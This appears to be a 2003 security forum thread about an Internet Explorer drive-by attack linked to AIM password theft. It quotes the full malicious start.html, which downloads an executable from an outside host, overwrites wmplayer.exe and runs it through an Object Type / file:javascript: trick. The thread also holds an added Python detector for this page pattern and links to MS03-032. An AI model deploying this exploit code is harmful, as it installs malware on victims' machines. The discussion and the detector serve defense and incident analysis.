-
AIM Password theft
My apologies if this is in the wrong forum, I couldn't decide where to post.
There has been only one reply to the incidents mailing list, and I'm wondering if you folks could provide any insights. I have additional e-mails describing the problem, if anyone's interested.
curious
corn
------------email to follow----------------
Mark,
The code you just sent looks familiar to a SPAM I received
attempting to hijack users' e-gold accounts. Out of curiosity I
followed that link which loaded start.html (attached). What worries me
is that I'm running IE 6.0.2800.1106 with all the latest patches from
Microsoft and this page (start.html) rewrote wmplayer.exe on my local
drive without notice. After closing the page, I found two .exe files on
my desktop (which loaded from http://doz.linux162.onway.net/eg/1.exe).
Is this a new unknown vulnerability?
Brent Meshier
Global Transport Logistics, Inc.
http://www.gtlogistics.com/
"Innovative Fulfillment Solutions"
-----Original Message-----
From: Mark Coleman [mailto:[email protected]]
Sent: Tuesday, September 23, 2003 11:43 AM
To: [email protected]
Subject: [Fwd: Re: AIM Password theft]
Hi, can anyone shed some light on this for me? If this is new, it's
going to spread like wildfire. AOL or incidents lists have yet to
reply.... it appears to be a legitimate threat as I have at least one
user "infected" already. Thank you..
-Mark Coleman
<script language="vbs">
self.MoveTo 5000,5000
</script>
<object data="1.php"></object>
<textarea id="code" style="display:none;">
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://doz.linux162.onway.net/eg/1.exe",0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
location.href = "mms://";
</textarea>
<script language="javascript">
function preparecode(code) {
result = '';
lines = code.split(/\r\n/);
for (i=0;i<lines.length;i++) {
line = lines[i];
line = line.replace(/^\s+/,"");
line = line.replace(/\s+$/,"");
line = line.replace(/'/g,"\\'");
line = line.replace(/[\\]/g,"\\\\");
line = line.replace(/[/]/g,"%2f");
if (line != '') {
result += line +'\\r\\n';
}
}
return result;
}
function doit() {
mycode = preparecode(document.all.code.value);
myURL = "file:javascript:eval('" + mycode + "')";
window.open(myURL,"_media")
}
window.open("error.jsp","_media");
setTimeout("doit()", 5000);
</script>
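A content-inspection check for the start.html pattern quoted above, written as an added example that is not from this thread or from any vendor tool: it pulls script and hidden textarea bodies out of a page with Python's html.parser and scores the indicators this sample exhibits (ADODB.Stream plus SaveToFile, the file:javascript: eval trick, the _media target, the mms: handoff, and the <object data=...> loader). The weights, the threshold and the constructed sample page are my own assumptions.

```python
import re
from html.parser import HTMLParser

# Indicator patterns taken from the posted start.html; weights are an assumption.
INDICATORS = [
    (r'ActiveXObject\(\s*["\']ADODB\.Stream["\']', 4, "ADODB.Stream created from script"),
    (r'\.SaveToFile\s*\(', 4, "stream written to local disk"),
    (r'ActiveXObject\(\s*["\']Microsoft\.XMLHTTP["\']', 2, "XMLHTTP fetch of a remote payload"),
    (r'file:\s*javascript:', 4, "script pushed into the local (My Computer) zone"),
    (r'window\.open\(.*?["\']_media["\']', 3, "Media Bar (_media) frame used as execution context"),
    (r'["\']mms://', 2, "mms: handler used to launch the overwritten player"),
]

class _Collector(HTMLParser):  # gathers script/textarea text plus two structural hints
    def __init__(self):
        super().__init__()
        self.chunks, self._capture = [], False
        self.hidden_textarea = self.object_data = False
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag in ("script", "textarea"):
            self._capture = True
        if tag == "textarea" and "display:none" in (a.get("style") or "").replace(" ", "").lower():
            self.hidden_textarea = True
        if tag == "object" and a.get("data"):
            self.object_data = True  # <object data=...> is the MS03-032 Object Type vector
    def handle_endtag(self, tag):
        if tag in ("script", "textarea"):
            self._capture = False
    def handle_data(self, data):
        if self._capture:
            self.chunks.append(data)

def scan_html(html):
    """Return (score, findings); a score of 8 or more is treated as a likely drive-by page."""
    c = _Collector()
    c.feed(html)
    # preparecode() rewrites "/" as %2f before the eval, so undo that before matching.
    text = re.sub(r"%2f", "/", "\n".join(c.chunks), flags=re.I)
    score, findings = 0, []
    for pat, weight, desc in INDICATORS:
        if re.search(pat, text, re.I):
            score += weight; findings.append(desc)
    if c.hidden_textarea and "ActiveXObject" in text:
        score += 3; findings.append("ActiveX script staged in a hidden <textarea>")
    if c.object_data:
        score += 2; findings.append("<object data=...> loader present")
    return score, findings

# Constructed sample mirroring the posted structure (placeholder paths, no real URLs).
SAMPLE_DRIVEBY = ('<object data="1.php"></object><textarea id="code" style="display:none;">'
    'var x = new ActiveXObject("Microsoft.XMLHTTP"); var s = new ActiveXObject("ADODB.Stream");'
    's.SaveToFile("C:\\\\placeholder\\\\wmplayer.exe",2); location.href = "mms://";</textarea>'
    '<script>window.open("file:javascript:eval(\'x\')","_media");</script>')
```

Running scan_html over proxy-captured HTML flags this page family even when the payload URL or the overwritten executable name changes.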
-
There have been several more replies discussing it...
http://www.securityfocus.com/archive/1
-
Yeah, this has been kicked around BugTraq for a few days now. From what I remember, the patch that is supposed to fix the Data Object issue does not work. MS made a public announcement of this on the main page of the download section. Something about testing the claims that the patch is broken, and they will release a new one if they can confirm the claim.
Here is the link and a snip from the page:
"Microsoft originally issued this bulletin on August 20th, 2003. Subsequent to issuing the security bulletin, Microsoft received reports that the patch provided with this bulletin does not properly correct the Object Type Vulnerability (CAN-2003-0532)."
http://www.microsoft.com/technet/tre...n/MS03-032.asp
See the technical details section.
Then there is the actual bulletin:
http://www.microsoft.com/security/se...s/ms03-032.asp